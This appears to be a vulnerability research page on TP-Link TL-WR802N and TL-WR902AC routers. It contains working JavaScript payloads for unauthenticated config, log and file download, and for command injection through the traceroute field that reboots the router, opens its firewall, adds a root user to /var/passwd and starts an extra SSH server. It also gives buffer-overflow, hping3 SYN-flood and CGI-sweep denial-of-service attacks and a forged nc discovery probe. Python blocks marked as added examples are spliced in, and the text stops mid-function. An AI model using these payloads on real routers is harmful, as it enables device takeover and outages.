WMMEnable=1
X_TP_BeaconInterval=100
X_TP_RTSThreshold=2346
X_TP_FragmentThreshold=2346
X_TP_DTIMFrequency=1
X_TP_IsolateClients=0
X_TP_ShortGIEnable=1
totalAssociations=65
maxStaNum=32
X_TP_ShowRegionSelectionOnWeb=0
[error]0
// Firmware: 190428
var act_get_oid_list = ["IGD_DEV_INFO", "ETH_SWITCH", "SYS_MODE", "MULTIMODE"]
for(let i=0; i<act_get_oid_list.length; i++){
	$.act(ACT_GET, act_get_oid_list[i]);
}
$.exe(null, false, 0);
ⓘ Example Results (50 lines) (includes the "softwareVersion" string)
[0,0,0,0,0,0]0
manufacturer=TP-Link
manufacturerOUI=74DA88
modelName=TL-WR802N
description=TP-Link Wireless N Nano Router WR802N 
productClass=IGD
serialNumber=74DA88FCC3AE
hardwareVersion=TL-WR802N v4 00000004
softwareVersion=0.9.1 3.17 v0001.0 Build 190428 Rel.63523n
modemFirmwareVersion=
enabledOptions=
additionalHardwareVersion=00000004
additionalSoftwareVersion=
specVersion=1.0
provisioningCode=
upTime=76
firstUseDate=
deviceLog=0x58801d6c
X_TP_HardwareID=FEDC62EBE64D50D422C775E201ADCE6F
X_TP_FirmwareID=E24EF98E8F388F5387CC7AEA4D362363
X_TP_HardwareDescription=TL-WR802N 4.0
X_TP_isFD=1
X_TP_DevManufacturerURL=http://www.tp-link.com
X_TP_DevModelVersion=4.0
X_TP_ProductID=134348804
X_TP_ProductVersion=1
X_TP_SoftwareRevision=1437205265
X_TP_SoftwareRevisionMinor=0
X_TP_PlatformVersion=2768242945
X_TP_BuildDate=190428
X_TP_BuildTime=63523
[0,0,0,0,0,0]1
enableVirtualPorts=0
numberOfVirtualPorts=4
ifName=eth0
[0,0,0,0,0,0]2
mode=ETH
DSLL3ForwardingName=NO_INTERFACE
ETHL3ForwardingName=NO_INTERFACE
_3GL3ForwardingName=NO_INTERFACE
DSLL3IPv6ForwardingName=NO_INTERFACE
ETHL3IPv6ForwardingName=NO_INTERFACE
[0,0,0,0,0,0]3
oneKeyRePressed=0
mode=Router
first_login=0
router_IPInterfaceIPAddress=192.168.0.1
router_IPInterfaceSubnetMask=255.255.255.0
router_ConnName=
[error]0
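The key=value dumps above (the 447-line and the 50-line results) are easier to audit once parsed. The following is an added example, not code from this page or from TP-Link: it parses the record format the CGI returns ([stack]index headers, key=value lines, an [error] trailer) and reports every credential or key-material field that came back with a value. The sample response is constructed from the dumps above with placeholder secrets; the /cgi/* endpoints that answer with a [cgi] header followed by JavaScript are out of scope.

```python
"""Parser and secrets audit for the key=value response format of the TP-Link
$.act() CGI calls shown on this page (added example, not vendor code)."""
import re
from dataclasses import dataclass, field

# Header of one response record, e.g. "[1,2,0,0,0,0]60": instance stack, record index
_RECORD_RE = re.compile(r"^\[(\d+(?:,\d+)*)\](\d+)$")
# Trailer of the whole response, e.g. "[error]0"
_ERROR_RE = re.compile(r"^\[error\](-?\d+)$")

# Keys whose values are credentials or key material; the dumps on this page show
# all of them being returned to an unauthenticated caller.
SENSITIVE_KEYS = frozenset({
    "adminPwd", "rootPwd", "userPwd", "passwd", "password", "token",
    "X_TP_PreSharedKey", "X_TP_RadiusServerPassword", "flashPin",
})


@dataclass
class Record:
    stack: tuple                      # e.g. (1, 2, 0, 0, 0, 0)
    index: int                        # position of the $.act() call that produced it
    params: dict = field(default_factory=dict)


def parse_cgi_response(text):
    """Split a raw response into records and the trailing [error] code.

    Returns (records, error_code); error_code is None if no trailer was seen.
    """
    records, error_code, current = [], None, None
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if not line:
            continue
        m = _RECORD_RE.match(line)
        if m:
            current = Record(tuple(int(x) for x in m.group(1).split(",")),
                             int(m.group(2)))
            records.append(current)
            continue
        m = _ERROR_RE.match(line)
        if m:
            error_code = int(m.group(1))
            current = None
            continue
        if current is None or "=" not in line:
            raise ValueError("unexpected line outside a record: %r" % line)
        # Split on the FIRST '=' only: base64 values such as publicKey2 end in '=='
        key, _, value = line.partition("=")
        current.params[key] = value
    return records, error_code


def find_secrets(records):
    """Return (record index, key) for every sensitive key with a non-empty value."""
    hits = []
    for rec in records:
        for key, value in rec.params.items():
            if key in SENSITIVE_KEYS and value != "":
                hits.append((rec.index, key))
    return hits


# Constructed sample modelled on the dumps above; secret values are placeholders.
SAMPLE_RESPONSE = """\
[0,0,0,0,0,0]0
rootName=
rootPwd=
adminName=admin
adminPwd=PLACEHOLDER_PW
userName=
userPwd=
[0,0,0,0,0,0]1
flashMac=98:DA:C4:6E:00:FC
flashPin=00000000
publicKey2=QUJDRA==
[1,2,0,0,0,0]2
SSID=TP-Link_00FC_5G
X_TP_PreSharedKey=PLACEHOLDER_PSK
X_TP_RadiusServerPassword=
[error]0
"""

if __name__ == "__main__":
    recs, err = parse_cgi_response(SAMPLE_RESPONSE)
    for idx, key in find_secrets(recs):
        print("record %d: %s is disclosed" % (idx, key))
    print("error code:", err)
```

Run it against a response captured from the browser console to get the list of fields a device hands out without authentication.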
ⓘ Download the server configuration
// Firmware: 170828, 190428
$.ajax(
{
	type: "POST",
	url: "http://192.168.1.1/cgi/conf.bin?",
	success: function(data) {
		console.log(data);
	},
	error: function(errno) {
		console.log(errno);
	}
});
ⓘ Download the server logs
// Firmware: 170828
$.ajax({
	type: "POST",
	url: "/cgi/log?",
	success: data => console.log(data)
});

/* Example Results
1970-01-01 00:00:14 [5] DHCPC: Send DISCOVER with request ip 0.0.0.0 and unicast flag 0
1970-01-01 00:00:16 [5] DHCPC: Send DISCOVER with request ip 0.0.0.0 and unicast flag 0
1970-01-01 00:00:19 [5] DHCPC: Send DISCOVER with request ip 0.0.0.0 and unicast flag 0
1970-01-01 00:00:20 [5] DHCPC: Recv OFFER from server 192.168.0.1 with ip 192.168.0.107
1970-01-01 00:00:21 [5] DHCPC: Send REQUEST to server 192.168.0.1 with request ip 192.168.0.107
1970-01-01 00:00:22 [5] DHCPC: Recv ACK from server 192.168.0.1 with ip 192.168.0.107 lease time 3600
1970-01-01 00:00:22 [5] DHCPC: Recv DNS server address 192.168.0.1,0,0,0,0
2020-06-28 22:48:18 [5] DHCPD: Recv REQUEST from XX:XX:XX:XX:XX:XX
2020-06-28 22:48:19 [5] DHCPD: Send ACK to 192.168.1.100*/
ⓘ Download any file from the Webserver
// Firmware: 170828, 190428
let __getFile = path => {
	$.ajax({
		type: "POST",
		url: path,
		success: data => console.log(data),
		error: errno => console.log(errno)
	});
};

__getFile("/cgi/info");

Code Injection

Similar to the already listed CVE-2019-15060 concerning the TL-WR840N router with firmware 0.9.1 3.16, the traceroute function on the TP-Link TL-WR902AC v4 with firmware 0.9.1 0.1 (170828) is vulnerable to remote code execution via a crafted payload in an IP address input field. This again works completely unauthenticated from the login screen or via forged packets using cURL. The TL-WR802N with firmware 0.9.1 3.17 is no longer affected by the code execution, while the DoS attack using the same traceroute function exists in both firmware versions.
Command Injection via CGI Examples
// Inject Command
let __inject = command => {
	let parameter = {host: ";"+command+";", X_TP_ConnName: "lo0"};

	$.act(ACT_SET, TRACEROUTE_DIAG, null, null, parameter);
	$.act(ACT_OP, ACT_OP_TRACERT);
	$.exe();
}

// Reboot
__inject("reboot");
__inject("kill 1");

// Enable access to all service from WAN 
// Web Interface fails due to wrong referer header
__inject("iptables -P INPUT ACCEPT");

// Add user to the passwd file
__inject("echo test:test:0:0:root:/:/bin/sh >> /var/passwd");

// Start another Dropbear instance on a different port
__inject("dropbear -p 2222 -r /var/tmp/dropbear/dropbear_rsa_host_key");
// Minified
$.act(ACT_SET, TRACEROUTE_DIAG, null, null, {host: ";reboot;", X_TP_ConnName: "lo0"}); 
$.act(ACT_OP, ACT_OP_TRACERT); 
$.exe();
Note: The first ; is used to end the tracert command. The second ; is used to separate any possibly attached tracert parameters from the injected command.

Denial-of-Service

There are several ways to make the device crash or misbehave.

Using Code Injection

// Crash device (Needs hard reset)
// Firmware: 170828 (no auth)
$.act(ACT_SET, TRACEROUTE_DIAG, null, null, { host: ";" }); $.exe();
// Doesn't poweroff but crashes everything instead
// Firmware: 170828
$.act(ACT_SET, TRACEROUTE_DIAG, null, null, { host: ";poweroff;" }); $.exe();

Using Buffer Overflow

// This kills the httpd daemon (verified using UART) (restarting httpd does not work)
// Firmware: 170828 (no auth), 190428 (auth)
let __inject = command => {
	$.act(ACT_SET, TRACEROUTE_DIAG, null, null, {host: command, X_TP_ConnName: "lo0"}); 
	$.act(ACT_OP, ACT_OP_TRACERT);
	$.exe();
}

let buffer_size = 2046;
let buffer = "";

for(let i = 0; i < buffer_size; i++){
    buffer += "X";
} 

__inject(buffer);

/* Remaining services running
PORT      STATE   SERVICE 		VERSION
21/tcp    closed  ftp     		vsftpd 2.0.8 or later
22/tcp    open    ssh     		Dropbear sshd 2012.55
80/tcp    closed  http    		TP-LINK TD-W8968 http
1900/tcp  open    upnp    		Portable SDK for UPnP
139 /tcp  closed  netbios-ssn 	Samba smbd 3.X - 4.X
445/tcp   closed  netbios-ssn 	Samba smbd 3.0.14a
40955/tcp closed  upnp       	Portable SDK for UPnP
*/
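One way a CGI handler could have avoided both the command injection above and the crash on an over-long host value, as an added example that is not part of the original page or of the TP-Link firmware (the ALLOWED_CONN_NAMES allowlist and the exact traceroute invocation are assumptions):

```python
"""Hardened handling of a traceroute 'host' parameter (added example).

Not code from the page or from TP-Link's firmware: it shows the two checks
whose absence the injection and buffer-overflow payloads above exploit. The
value is allowlisted (an IP literal or a plain hostname, bounded in length)
and handed to traceroute as its own argv element, never through a shell
string, so ';' can never start a second command.
"""
from __future__ import annotations

import ipaddress
import re
import subprocess

MAX_HOST_LEN = 253  # RFC 1035: longest fully qualified domain name
# One RFC 1123 label: letters, digits and '-', no leading or trailing '-'.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# Allowlist for the X_TP_ConnName parameter; constructed for this example from
# the only value the page shows ("lo0"). A real CGI would list its connections.
ALLOWED_CONN_NAMES = frozenset({"lo0"})


class InvalidParameter(ValueError):
    """Raised for any value that is not an IP literal, hostname or known name."""


def validate_host(raw: object) -> str:
    """Return the host if it is an IPv4/IPv6 literal or a hostname, else raise.

    Everything the page injects (';reboot;', ';', 'echo ... >> /var/passwd',
    2046 bytes of 'X') fails here: shell metacharacters, spaces and slashes
    never match a label, and the length check bounds the input before any
    fixed-size buffer in a CGI could see it.
    """
    if not isinstance(raw, str) or not raw or len(raw) > MAX_HOST_LEN:
        raise InvalidParameter("host is missing, empty or over-long")
    try:
        return str(ipaddress.ip_address(raw))
    except ValueError:
        pass  # not an IP literal, try the hostname grammar
    labels = raw.rstrip(".").split(".")
    if all(LABEL_RE.match(label) for label in labels):
        return raw
    raise InvalidParameter(f"not an address or hostname: {raw!r}")


def build_traceroute_argv(host: object, conn_name: object) -> list[str]:
    """Build the argv a CGI handler should pass to subprocess.run()."""
    if conn_name not in ALLOWED_CONN_NAMES:
        raise InvalidParameter(f"unknown connection name: {conn_name!r}")
    # '-n' (numeric output) exists in BusyBox and Linux traceroute alike;
    # mapping conn_name to an interface is firmware-specific and omitted here.
    return ["traceroute", "-n", validate_host(host)]


def run_traceroute(host: object, conn_name: object) -> subprocess.CompletedProcess:
    """Execute traceroute without a shell: argv elements are never re-parsed."""
    return subprocess.run(build_traceroute_argv(host, conn_name),
                          capture_output=True, text=True, timeout=60)


def is_rejected(host: object, conn_name: object = "lo0") -> bool:
    """True when the handler would refuse the request before running anything."""
    try:
        build_traceroute_argv(host, conn_name)
    except InvalidParameter:
        return True
    return False


if __name__ == "__main__":
    # The page's payloads plus two legitimate inputs, as a quick self-check.
    for value in [";reboot;", ";", ";poweroff;", "X" * 2046,
                  "echo test:test:0:0:root:/:/bin/sh >> /var/passwd",
                  "192.168.1.1", "www.example.com"]:
        print(f"{'REJECT' if is_rejected(value) else 'accept':7} {value[:40]!r}")
```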

Using hPing

# TCP SYN FLOOD ATTACK
# Strongly affects the overall system performance and makes even a UART connection buggy
sudo hping3  -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.1

# Makes everything slower but no global denial of service
sudo hping3  -c 15000 -d 120 -S -w 64 -p 22 --flood --rand-source 192.168.1.1
sudo hping3  -c 15000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.1.1
sudo hping3  -c 15000 -d 120 -S -w 64 -p 139 --flood --rand-source 192.168.1.1
sudo hping3  -c 15000 -d 120 -S -w 64 -p 445 --flood --rand-source 192.168.1.1
sudo hping3  -c 15000 -d 120 -S -w 64 -p 1900 --flood --rand-source 192.168.1.1
sudo hping3  -c 15000 -d 120 -S -w 64 -p 40955 --flood --rand-source 192.168.1.1

Using some odd CGI calls

// Also crashes the server (unknown which OID triggers it)
// httpd still running but no longer responding (doesn't kill any service)
var oid_list = [IGD, IGD_DEV_INFO, SYSLOG_CFG, MANAGEMENT_SERVER, ETH_SWITCH, SYS_CFG, NET_CFG, USER_CFG, CURRENT_USER, APP_CFG, HTTP_CFG, PH_DDNS_CFG, PH_RT_DATA, DYN_DNS_CFG, UPNP_CFG, UPNP_PORTMAPPING, DIAG_TOOL, CWMP_CFG, SNMP_CFG, NOIP_DNS_CFG, CMX_DNS_CFG, ACL_CFG, WAN_TYPE_DETECT, DMZ_HOST_CFG, TIME, HOUR, L3_FORWARDING, L3_FORWARDING_ENTRY, L3_IP6_FORWARDING, L3_IP6_FORWARDING_ENTRY, L2_BRIDGING, L2_BRIDGING_ENTRY, L2_BRIDGING_FILTER, L2_BRIDGING_INTF, LAN_DEV, LAN_HOST_CFG, LAN_IP_INTF, LAN_DHCP_STATIC_ADDR, LAN_DHCP_COND_SRV_POOL, LAN_DHCP_COND_SRV_POOL_OPT, YANDEX_DNS_POOL, LAN_IP6_HOST_CFG, LAN_IP6_INTF, LAN_ETH_INTF, LAN_HOSTS, LAN_HOST_ENTRY, LAN_WLAN, LAN_WLAN_WPS, LAN_WLAN_MACTABLEENTRY, LAN_WLAN_ASSOC_DEV, LAN_WLAN_BSSDESC_ENTRY, LAN_WLAN_WEPKEY, LAN_WLAN_WDSBRIDGE, LAN_WLAN_MULTISSID, LAN_WLAN_MSSIDENTRY, LAN_WLAN_MSSIDWEPKEY, MSSID_MACTABLEENTRY, LAN_WLAN_WLBRNAME, LAN_WLAN_TASK_SCHEDULE, LAN_WLAN_QUICKSAVE, LAN_WLAN_GUESTNET, LAN_IGMP_SNOOP, WAN_DEV, WAN_COMMON_INTF_CFG, WAN_DSL_INTF_CFG, WAN_DSL_INTF_STATS, WAN_DSL_INTF_STATS_TOTAL, WAN_DSL_AUTOPVC, WAN_DSL_AUTO_PVC_PAIR, WAN_ETH_INTF, WAN_ETH_INTF_STATS, WAN_PON, WAN_EPON_INTF, WAN_EPON_INTF_OAM_STATS, WAN_EPON_INTF_MPCP_STATS, WAN_EPON_INTF_STATS, WAN_EPON_INTF_OPTICAL_STATS, WAN_GPON_INTF, WAN_GPON_INTF_OMCI_STATS, WAN_GPON_INTF_STATS, WAN_GPON_INTF_OPTICAL_STATS, WAN_CONN_DEVICE, WAN_DSL_LINK_CFG, WAN_PON_LINK_CFG, WAN_ETH_LINK_CFG, WAN_USB_3G_LINK_CFG, USB_MODEM_PARAM, WAN_L2TP_CONN, WAN_L2TP_CONN_PORTMAPPING, L2TP_CONN_PORTTRIGGERING, WAN_L2TP_CONN_STATS, WAN_PPTP_CONN, WAN_PPTP_CONN_PORTMAPPING, PPTP_CONN_PORTTRIGGERING, WAN_PPTP_CONN_STATS, WAN_IP_CONN, WAN_IP_CONN_PORTMAPPING, IP_CONN_PORTTRIGGERING, WAN_PPP_CONN, WAN_PPP_CONN_PORTMAPPING, PPP_CONN_PORTTRIGGERING, WAN_PPP_CONN_STATS, STAT_CFG, STAT_ENTRY, DDOS_CFG, DOS_HOST, ARP, ARP_ENTRY, ARP_BIND, ARP_BIND_ENTRY, QUEUE_MANAGEMENT, CLASSIFICATION, QOS_APP, QOS_INTF, QOS_QUEUE, TC, TC_RULE, ALG_CFG, IPTV, DSL_IPTV_CFG, ETH_IPTV_CFG, 
FIREWALL, INTERNAL_HOST, EXTERNAL_HOST, TASK_SCHEDULE, RULE, URL_LIST, URL_CFG, IP6_FIREWALL, IP6_INTERNAL_HOST, IP6_EXTERNAL_HOST, IP6_TASK_SCHEDULE, IP6_RULE, IP6_TUNNEL, DSLITE, SIT_6RD, SERVICES, VOICE, XTP_VOICE_PROCESS_STS, XTP_VOICE_PROCESS, VOICE_CAP, VOICE_CAP_SIP, VOICE_CAP_MGCP, VOICE_CAP_CODECS, VOICE_PROF, VOICE_PROF_PROVIDER, VOICE_PROF_SIP, VOICE_PROF_SIP_EVTSUBSCRIBE, VOICE_PROF_MGCP, VOICE_PROF_RTP, VOICE_PROF_FAXT38, XTP_USB_VOICEMAIL_PUBLICCFG, XTP_MULTI_ISP, XTP_MULTIISP_CODEC, XTP_MULTIISP_CODEC_LIST, VOICE_PROF_LINE, VOICE_PROF_LINE_SIP, VOICE_PROF_LINE_XTPUSBVM, VOICE_PROF_LINE_CALLFEAT, VOICE_PROF_LINE_PROC, VOICE_PROF_LINE_CODEC, VOICE_PROF_LINE_CODEC_LIST, VOICE_PROF_LINE_STATS, XTP_FEATURE_CODE, VOICE_PHY_INTERFACE, VOICE_PHYINTERFACE_TESTS, XTP_VOICE_MULTI_ISPDIALPLAN, XTP_VOICE_PSTN, STORAGE_SERVICE, CAPABLE, USER_ACCOUNT, USB_DEVICE, LOGICAL_VOLUME, FOLDER_BROWSE, FOLDER_NODE, DLNA_MEDIA_SERVER, DLNA_MEDIA_SERVER_FOLDER, SMB_SERVICE, SMB_SERVICE_FOLDER, SMB_USER_ACCESS, FTP_SERVER, FTP_SERVER_FOLDER, FTP_USER_ACCESS, XTP_PRINT_SERVICE, XTP_IGD_CALL_FIREWALL_CFG, XTP_IGD_SPEED_DIAL_CFG, XTP_IGD_MULTI_ISP_DIAL_PLAN, XTP_IGD_MULTIISPDP_LIST, XTP_CALLLOGCFG, IPSEC, IPSEC_CFG, SYS_MODE, EWAN, USER_INFO, GPON_USER_INFO, GPON_AUTH_CTC, GPON_AUTH_SN, GPON_AUTH_PWD, GPON_MAC_INFO, GPON_FWD_RULE, GPON_LOCAL_RULE_ENTRY, GPON_REMOTE_RULE_ENTRY, GPON_OMCI_IOT, GPON_OMCI_IOT_ENTRY, GPON_OMCI_ME_ATTR, CLOUD_SERVICE, FW_UPGRADE_INFO, CLOUD_USER_ACCOUNT, OWNER_INFO, CURRENT_USER_INFO, CLOUD_DDNS, CLOUD_DDNS_ENTRY, WAN_BLOCK, WAN_ERROR_BLOCK, FW_UP_INFO_BLOCK, IPPING_DIAG, TRACEROUTE_DIAG, SDMZ_CFG, WEB_CFG, VLAN, ISP_SERVICE, WOL, WOL_ITEM, IPV6_CFG, SYS_STATE, IPV6_PASS_THROUGH, AUTO_REBOOT_CFG, CPU_MEM, PRODUCE_INFO, MULTIMODE, MULTIMODE_AP, AP_CONFIG_WEPKEY, AP_SNMP_CFG, MULTIMODE_CLIENT, MULTIMODE_RE, RE_CONFIG_WEPKEY, MULTIMODE_ROUTER, ROUTER_CONFIG_WEPKEY, ROUTER_CONFIG_MULTISSID, ROUTER_CONFIG_MSSIDENTRY, MULTIMODE_MSSID, MSSID_CONFIG_MULTISSID, 
MSSID_CONFIG_MSSIDENTRY, MULTIMODE_HOTSPOT, PING_WATCH_DOG, LED_CONTROL];

for(let i=0; i<oid_list.length; i++){
	$.act(ACT_GL, oid_list[i]);
	$.exe();
}

Mobile App

Tether

"TP-Link Tether provides the easiest way to access and manage your TP-Link Router/ xDSL Router/ Range Extender with your mobile devices. From quick setup to parental controls, Tether provides a simple, intuitive user interface to see your device status, online client devices and their privileges."
Note: The TP-Link Tether app adopts SSH services and TCP port 22 is opened on supported TP-Link devices. However, these SSH services are only available for TP-Link apps. Other SSH clients cannot access TP-Link products or adjust their settings with command lines. Source: [Support]
OS       Link
Android  https://play.google.com/store/apps/details?id=com.tplink.tether
iOS      https://itunes.apple.com/us/app/tp-link-tether/id599496594?ls=1&mt=8
Note: Requires in-depth investigation!
Tether: Wireshark Device Discovery


Device Discovery

Before establishing an SSH session, the Tether app sends a multicast discovery UDP packet to 255.255.255.255 on port 20002. This message is sent four times. After that, the Tether app sends another, unicast, message to each responding device on port 20002. The syntax of the payload is mostly unclear and changes after a restart; nevertheless, a device will still respond to any payload captured at any earlier time. I assume that this discovery process is used to obtain device capabilities and finally to initialize a secure channel via SSH. How the SSH tunnel gets initiated is also unknown at this stage of the research. The Tether app uses the Java Secure Channel client and the devices use a Dropbear server for SSH connections.


Multicast Discovery Request
Internet Protocol Version 4, Src: 192.168.1.102, Dst: 255.255.255.255
User Datagram Protocol, Src Port: 54909, Dst Port: 20002
Data: 0100000200001101000001d235406ce6 (16 bytes)

	// 0000   ff ff ff ff ff ff 3c 22 fb 9b fb 7e 08 00 45 00   ......<"...~..E.
	// 0010   00 2c 16 ae 40 00 40 11 62 05 c0 a8 01 66 ff ff   .,..@.@.b....f..
	// 0020   ff ff d6 7d 4e 22 00 18 63 14 01 00 00 02 00 00   ...}N"..c.......
	// 0030   11 01 00 00 01 d2 35 40 6c e6                     ......5@l.
Multicast Discovery Response
Internet Protocol Version 4, Src: 192.168.1.1, Dst: 192.168.1.102
User Datagram Protocol, Src Port: 20002, Dst Port: 54909
Data: 0100000200b01201000001d2fdb65d9800010004c0a80101 (192 bytes)

	// 0000   3c 22 fb 9b fb 7e 98 da c4 6e 00 fc 08 00 45 00   <"...~...n....E.
	// 0010   00 dc 00 00 40 00 40 11 b6 59 c0 a8 01 01 c0 a8   ....@.@..Y......
	// 0020   01 66 4e 22 d6 7d 00 c8 3e c8 01 00 00 02 00 b0   .fN".}..>.......
	// 0030   12 01 00 00 01 d2 fd b6 5d 98 00 01 00 04 c0 a8   ........].......
	// 0040   01 01 ff 00 00 00 00 06 00 04 ff ff ff 00 ff 00   ................
	// 0050   00 00 00 02 00 11 39 38 3a 44 41 3a 43 34 3a 36   ......98:DA:C4:6
	// 0060   45 3a 30 30 3a 46 43 ff 00 00 00 03 00 0c 54 50   E:00:FC.......TP
	// 0070   2d 4c 69 6e 6b 5f 30 30 46 43 ff 00 00 00 00 04   -Link_00FC......
	// 0080   00 04 00 0d c8 8f ff 00 00 00 00 05 00 0a 54 4c   ..............TL
	// 0090   2d 57 52 39 30 32 41 43 ff 00 00 08 00 04 00 00   -WR902AC........
	// 00a0   00 01 ff 00 00 00 00 09 00 0e 57 69 72 65 6c 65   ..........Wirele
	// 00b0   73 73 52 6f 75 74 65 72 ff 00 00 10 00 28 65 64   ssRouter.....(ed
	// 00c0   63 38 37 66 37 39 37 32 37 31 39 66 66 33 36 64   c87f7972719ff36d
	// 00d0   30 37 36 66 61 30 35 34 30 65 33 39 62 62 46 46   076fa0540e39bbFF
	// 00e0   30 30 30 30 30 30 ff 00 00 00                     000000....
Unicast Discovery Request
Internet Protocol Version 4, Src: 192.168.1.102, Dst: 192.168.1.1
User Datagram Protocol, Src Port: 44794, Dst Port: 20002
Data: 0100000200001101000003e56b89a97b (16 bytes)

	// 0000   98 da c4 6e 00 fc 3c 22 fb 9b fb 7e 08 00 45 00   ...n..<"...~..E.
	// 0010   00 2c a6 c3 40 00 40 11 10 46 c0 a8 01 66 c0 a8   .,..@.@..F...f..
	// 0020   01 01 ae fa 4e 22 00 18 53 fc 01 00 00 02 00 00   ....N"..S.......
	// 0030   11 01 00 00 03 e5 6b 89 a9 7b                     ......k..{
Unicast Discovery Response
Internet Protocol Version 4, Src: 192.168.1.1, Dst: 192.168.1.102
User Datagram Protocol, Src Port: 20002, Dst Port: 44794
Data: 0100000200b01201000003e56c37995b00010004c0a80101 (192 bytes)

	// 0000   3c 22 fb 9b fb 7e 98 da c4 6e 00 fc 08 00 45 00   <"...~...n....E.
	// 0010   00 dc 00 00 40 00 40 11 b6 59 c0 a8 01 01 c0 a8   ....@.@..Y......
	// 0020   01 66 4e 22 ae fa 00 c8 b9 f4 01 00 00 02 00 b0   .fN"............
	// 0030   12 01 00 00 03 e5 6c 37 99 5b 00 01 00 04 c0 a8   ......l7.[......
	// 0040   01 01 ff 00 00 00 00 06 00 04 ff ff ff 00 ff 00   ................
	// 0050   00 00 00 02 00 11 39 38 3a 44 41 3a 43 34 3a 36   ......98:DA:C4:6
	// 0060   45 3a 30 30 3a 46 43 ff 00 00 00 03 00 0c 54 50   E:00:FC.......TP
	// 0070   2d 4c 69 6e 6b 5f 30 30 46 43 ff 00 00 00 00 04   -Link_00FC......
	// 0080   00 04 00 0d c8 8f ff 00 00 00 00 05 00 0a 54 4c   ..............TL
	// 0090   2d 57 52 39 30 32 41 43 ff 00 00 08 00 04 00 00   -WR902AC........
	// 00a0   00 01 ff 00 00 00 00 09 00 0e 57 69 72 65 6c 65   ..........Wirele
	// 00b0   73 73 52 6f 75 74 65 72 ff 00 00 10 00 28 65 64   ssRouter.....(ed
	// 00c0   63 38 37 66 37 39 37 32 37 31 39 66 66 33 36 64   c87f7972719ff36d
	// 00d0   30 37 36 66 61 30 35 34 30 65 33 39 62 62 46 46   076fa0540e39bbFF
	// 00e0   30 30 30 30 30 30 ff 00 00 00                     000000....


Forged Unicast Discovery Request plus Response Example

echo -e '\x01''\x00''\x00''\x02''\x00''\x00''\x11''\x01''\x00''\x00''\x02''\x89''\xfc''\x17''\xe0''\x92' | nc -u 192.168.1.1 20002 | hexdump -C
00000000  01 00 00 02 00 b0 12 01  00 00 02 89 d2 9d a4 13  |................|
00000010  00 01 00 04 c0 a8 01 01  ff 00 00 00 00 06 00 04  |................|
00000020  ff ff ff 00 ff 00 00 00  00 02 00 11 39 38 3a 44  |............98:D|
00000030  41 3a 43 34 3a 36 45 3a  30 30 3a 46 43 ff 00 00  |A:C4:6E:00:FC...|
00000040  00 03 00 0c 54 50 2d 4c  69 6e 6b 5f 30 30 46 43  |....TP-Link_00FC|
00000050  ff 00 00 00 00 04 00 04  00 0d c8 8f ff 00 00 00  |................|
00000060  00 05 00 0a 54 4c 2d 57  52 39 30 32 41 43 ff 00  |....TL-WR902AC..|
00000070  00 08 00 04 00 00 00 01  ff 00 00 00 00 09 00 0e  |................|
00000080  57 69 72 65 6c 65 73 73  52 6f 75 74 65 72 ff 00  |WirelessRouter..|
00000090  00 10 00 28 65 64 63 38  37 66 37 39 37 32 37 31  |...(edc87f797271|
000000a0  39 66 66 33 36 64 30 37  36 66 61 30 35 34 30 65  |9ff36d076fa0540e|
000000b0  33 39 62 62 46 46 30 30  30 30 30 30 ff 00 00 00  |39bbFF000000....|
Point of interest: edc87f7972719ff36d076fa0540e39bb (32B) FF000000 (8B)
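As an added example (not from the page or from TP-Link), a decoder for the discovery messages captured above. The header field meanings, the 0xff terminator padded to a 4-byte boundary and the TLV field names are this editor's assumptions inferred from the dumps; the decoder makes explicit what the device discloses (LAN address, MAC, SSID, model) to any unauthenticated UDP probe on port 20002, which is what a LAN monitor would want to flag.

```python
"""Decoder for the Tether discovery messages shown above (added example).

Not code from the page or from TP-Link. Assumed layout, read off the dumps:
a 16-byte header (magic, payload length, opcode, transaction id, 4 unknown
bytes) followed by TLVs with a 2-byte type, 2-byte length and value, each
closed by a 0xff byte zero-padded to the next 4-byte boundary. The names
given to TLV types are guesses from their contents.
"""
from __future__ import annotations

import ipaddress
import struct

# Forged unicast request (16 bytes) and the router's reply (192 bytes),
# copied from the hexdump above.
REQUEST = bytes.fromhex("01000002 0000 1101 00000289 fc17e092")
RESPONSE = bytes.fromhex("""
01 00 00 02 00 b0 12 01 00 00 02 89 d2 9d a4 13
00 01 00 04 c0 a8 01 01 ff 00 00 00 00 06 00 04
ff ff ff 00 ff 00 00 00 00 02 00 11 39 38 3a 44
41 3a 43 34 3a 36 45 3a 30 30 3a 46 43 ff 00 00
00 03 00 0c 54 50 2d 4c 69 6e 6b 5f 30 30 46 43
ff 00 00 00 00 04 00 04 00 0d c8 8f ff 00 00 00
00 05 00 0a 54 4c 2d 57 52 39 30 32 41 43 ff 00
00 08 00 04 00 00 00 01 ff 00 00 00 00 09 00 0e
57 69 72 65 6c 65 73 73 52 6f 75 74 65 72 ff 00
00 10 00 28 65 64 63 38 37 66 37 39 37 32 37 31
39 66 66 33 36 64 30 37 36 66 61 30 35 34 30 65
33 39 62 62 46 46 30 30 30 30 30 30 ff 00 00 00
""")

HEADER_LEN = 16
HEADER = struct.Struct(">IHHI4s")  # magic, payload_len, opcode, txn_id, tail
MAGIC = 0x01000002                  # first four bytes of every capture
OP_REQUEST, OP_RESPONSE = 0x1101, 0x1201

# Assumed meanings, taken from the values in the capture; not documented.
TLV_NAMES = {0x0001: "ip", 0x0002: "mac", 0x0003: "ssid", 0x0005: "model",
             0x0006: "netmask", 0x0009: "role", 0x0010: "token"}
IPV4_TYPES = {0x0001, 0x0006}
ASCII_TYPES = {0x0002, 0x0003, 0x0005, 0x0009, 0x0010}


def parse_tlvs(payload: bytes) -> list[tuple[int, bytes]]:
    """Split the payload into (type, value) pairs, checking every terminator."""
    items, off = [], 0
    while off < len(payload):
        if off + 4 > len(payload):
            raise ValueError(f"truncated TLV header at offset {off}")
        typ, length = struct.unpack_from(">HH", payload, off)
        off += 4
        value = payload[off:off + length]
        if len(value) != length:
            raise ValueError(f"TLV type {typ:#06x} runs past end of payload")
        off += length
        # 0xff, then zeros up to the next 4-byte boundary (a full 4 bytes
        # when the value is already aligned). Inferred from the dump.
        pad = 4 - length % 4
        if payload[off:off + pad] != b"\xff" + b"\x00" * (pad - 1):
            raise ValueError(f"bad terminator after TLV type {typ:#06x}")
        off += pad
        items.append((typ, value))
    return items


def decode_discovery(data: bytes) -> dict:
    """Decode one request or reply into header fields plus named TLV values."""
    if len(data) < HEADER_LEN:
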